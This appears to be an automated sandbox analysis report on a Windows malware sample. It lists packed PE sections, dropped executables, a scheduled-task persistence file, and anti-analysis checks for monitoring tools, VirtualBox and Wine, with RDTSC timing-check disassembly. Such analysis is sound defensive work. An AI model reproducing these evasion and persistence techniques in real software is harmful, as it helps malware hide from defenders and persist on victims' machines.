                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.650000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxrwbqyp:EW;kfmupzhk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxrwbqyp:EW;kfmupzhk:EW;.taggant:EW;
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeUnpacked PE file: 8.2.DocumentsIIEBGIDAAF.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 9.2.skotes.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 10.2.skotes.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 12.2.skotes.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cldzocnb:EW;rviyezxx:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeUnpacked PE file: 14.2.607f096cd3.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dfoyrrjq:EW;vzxhknim:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: 607f096cd3.exe.12.drStatic PE information: real checksum: 0x1f35bd should be: 0x1f9dff
                      Source: skotes.exe.8.drStatic PE information: real checksum: 0x1da91f should be: 0x1d98a8
                      Source: file.exeStatic PE information: real checksum: 0x1bf0dc should be: 0x1bb1b2
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: real checksum: 0x1da91f should be: 0x1d98a8
                      Source: random[1].exe.1.drStatic PE information: real checksum: 0x1f35bd should be: 0x1f9dff
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: gxrwbqyp
                      Source: file.exeStatic PE information: section name: kfmupzhk
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name:
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: .idata
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name:
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: cldzocnb
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: rviyezxx
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: .taggant
                      Source: random[1].exe.1.drStatic PE information: section name:
                      Source: random[1].exe.1.drStatic PE information: section name: .idata
                      Source: random[1].exe.1.drStatic PE information: section name:
                      Source: random[1].exe.1.drStatic PE information: section name: dfoyrrjq
                      Source: random[1].exe.1.drStatic PE information: section name: vzxhknim
                      Source: random[1].exe.1.drStatic PE information: section name: .taggant
                      Source: skotes.exe.8.drStatic PE information: section name:
                      Source: skotes.exe.8.drStatic PE information: section name: .idata
                      Source: skotes.exe.8.drStatic PE information: section name:
                      Source: skotes.exe.8.drStatic PE information: section name: cldzocnb
                      Source: skotes.exe.8.drStatic PE information: section name: rviyezxx
                      Source: skotes.exe.8.drStatic PE information: section name: .taggant
                      Source: 607f096cd3.exe.12.drStatic PE information: section name:
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: .idata
                      Source: 607f096cd3.exe.12.drStatic PE information: section name:
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: dfoyrrjq
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: vzxhknim
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: .taggant
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push ecx; mov dword ptr [esp], eax10_1_0019BE4A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push 6C113000h; mov dword ptr [esp], esi10_1_0019BF46
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push ecx; mov dword ptr [esp], edx10_1_0019BF66
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push ebx; mov dword ptr [esp], edx10_1_0019BFA1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push edi; mov dword ptr [esp], ebx10_1_0019BFCD
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push 380A729Ah; mov dword ptr [esp], ebp10_1_0019BFF5
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push 5B4F19C3h; mov dword ptr [esp], ecx10_1_0019C025
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push 2335178Ch; mov dword ptr [esp], edi10_1_0019C09D
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0019BE1F push 01569154h; mov dword ptr [esp], ebp10_1_0019C0AD
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001FCA14 push 48D0E2D5h; mov dword ptr [esp], edx10_1_001FCA9A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001FCA14 push eax; mov dword ptr [esp], ebp10_1_001FCB92
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E9038 push 25FBFBF4h; mov dword ptr [esp], eax10_1_001E90BB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E9038 push 29145AEFh; mov dword ptr [esp], ebx10_1_001E90CA
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E9038 push edx; mov dword ptr [esp], 7EB98E7Ch10_1_001E918C
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E9038 push 355ACE57h; mov dword ptr [esp], esi10_1_001E91AD
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001E9038 push edx; mov dword ptr [esp], ebx10_1_001E91B1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0014FA20 push esp; ret 10_1_0014FA21
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push ebx; mov dword ptr [esp], eax10_1_00271DDB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push 103BA81Dh; mov dword ptr [esp], ebx10_1_00271DEB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push 09E2E7E1h; mov dword ptr [esp], eax10_1_00271DFD
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push edi; mov dword ptr [esp], ecx10_1_00271E4C
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push 27D84573h; mov dword ptr [esp], ecx10_1_00271E85
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push edx; mov dword ptr [esp], edi10_1_00271EAD
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push 2DEED2EFh; mov dword ptr [esp], edi10_1_00271EEC
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push ebp; mov dword ptr [esp], edi10_1_00271F2E
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push ecx; mov dword ptr [esp], edx10_1_00271F3E
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_00271C66 push 01D48C82h; mov dword ptr [esp], ebp10_1_00271F84
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001C047E push 4426754Bh; mov dword ptr [esp], ebp10_1_001C0510
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001C047E push 7EF442CAh; mov dword ptr [esp], ebx10_1_001C058A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_0014DE97 push cs; ret 10_1_0014DE98
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_1_001C42B1 push 391293A4h; mov dword ptr [esp], esp10_1_001C42F3
                      Source: file.exeStatic PE information: section name: gxrwbqyp entropy: 7.954289756415853
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: entropy: 7.975879077206606
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: section name: cldzocnb entropy: 7.954493315859396
                      Source: random[1].exe.1.drStatic PE information: section name: entropy: 7.926723117532397
                      Source: random[1].exe.1.drStatic PE information: section name: dfoyrrjq entropy: 7.9513955206394655
                      Source: skotes.exe.8.drStatic PE information: section name: entropy: 7.975879077206606
                      Source: skotes.exe.8.drStatic PE information: section name: cldzocnb entropy: 7.954493315859396
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: entropy: 7.926723117532397
                      Source: 607f096cd3.exe.12.drStatic PE information: section name: dfoyrrjq entropy: 7.9513955206394655

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsIIEBGIDAAF.exeJump to dropped file
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsIIEBGIDAAF.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsIIEBGIDAAF.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsIIEBGIDAAF.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0281 second address: 8A028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3778D7C026h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A028C second address: 8A02BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F3778D7B2C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A02BC second address: 89FAA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D27EFh], eax 0x00000011 push dword ptr [ebp+122D0EA9h] 0x00000017 cld 0x00000018 call dword ptr [ebp+122D223Ch] 0x0000001e pushad 0x0000001f stc 0x00000020 xor eax, eax 0x00000022 mov dword ptr [ebp+122D2EA6h], ecx 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c add dword ptr [ebp+122D212Dh], edx 0x00000032 mov dword ptr [ebp+122D28D2h], eax 0x00000038 jmp 00007F3778D7C033h 0x0000003d mov dword ptr [ebp+122D212Dh], esi 0x00000043 mov esi, 0000003Ch 0x00000048 jmp 00007F3778D7C02Ch 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 sub dword ptr [ebp+122D2EA6h], ecx 0x00000057 lodsw 0x00000059 cld 0x0000005a add eax, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f sub di, D831h 0x00000064 xor edi, dword ptr [ebp+122D2B3Ah] 0x0000006a popad 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 jmp 00007F3778D7C038h 0x00000075 adc ax, 5299h 0x0000007a popad 0x0000007b push eax 0x0000007c jc 00007F3778D7C030h 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3BE second address: A1D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D495 second address: A1D49F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3778D7C026h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D49F second address: A1D4C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov esi, dword ptr [ebp+122D22ADh] 0x00000015 push 00000000h 0x00000017 and ch, 0000003Ah 0x0000001a push C43B2449h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F3778D7B2B6h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D60B second address: A1D656 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3778D7C038h 0x00000008 jmp 00007F3778D7C032h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D2AD2h] 0x00000016 push 00000000h 0x00000018 mov edx, dword ptr [ebp+122D288Eh] 0x0000001e push 83E376BCh 0x00000023 pushad 0x00000024 pushad 0x00000025 jmp 00007F3778D7C02Fh 0x0000002a jl 00007F3778D7C026h 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D656 second address: A1D6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 add dword ptr [esp], 7C1C89C4h 0x0000000f jmp 00007F3778D7B2C7h 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D358Fh], esi 0x0000001c push 00000000h 0x0000001e jmp 00007F3778D7B2BEh 0x00000023 push 00000003h 0x00000025 mov edx, eax 0x00000027 call 00007F3778D7B2B9h 0x0000002c push ebx 0x0000002d jmp 00007F3778D7B2C0h 0x00000032 pop ebx 0x00000033 push eax 0x00000034 pushad 0x00000035 jns 00007F3778D7B2B8h 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D6C2 second address: A1D6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D6D1 second address: A1D6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D6D5 second address: A1D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D6E2 second address: A1D736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C8h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F3778D7B2C5h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3778D7B2C8h 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D736 second address: A1D796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b mov cx, ax 0x0000000e lea ebx, dword ptr [ebp+1245132Ch] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F3778D7C028h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D28B2h] 0x00000034 mov cx, 6BC5h 0x00000038 add dword ptr [ebp+122D34B5h], edx 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 pop eax 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D796 second address: A1D79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D853 second address: A1D857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D857 second address: A1D85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D85D second address: A1D863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D930 second address: A1D934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D934 second address: A1D93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3778D7C026h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E406 second address: A3E410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5B0 second address: A3C5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5B4 second address: A3C5D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BDh 0x00000007 jnp 00007F3778D7B2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5D0 second address: A3C5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5D6 second address: A3C5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5DB second address: A3C5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5E1 second address: A3C5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C8C7 second address: A3C8CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C8CC second address: A3C8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D23C second address: A3D240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D240 second address: A3D244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D3BC second address: A3D3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C038h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
